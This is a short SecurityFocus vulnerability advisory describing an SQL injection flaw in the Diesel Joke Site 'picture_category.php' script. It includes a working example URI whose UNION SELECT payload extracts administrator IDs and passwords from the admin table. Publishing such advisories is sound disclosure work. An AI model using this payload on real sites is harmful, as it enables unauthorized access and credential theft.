Diesel Joke Site 'picture_category.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*


 

Privacy Statement
Copyright 2010, SecurityFocus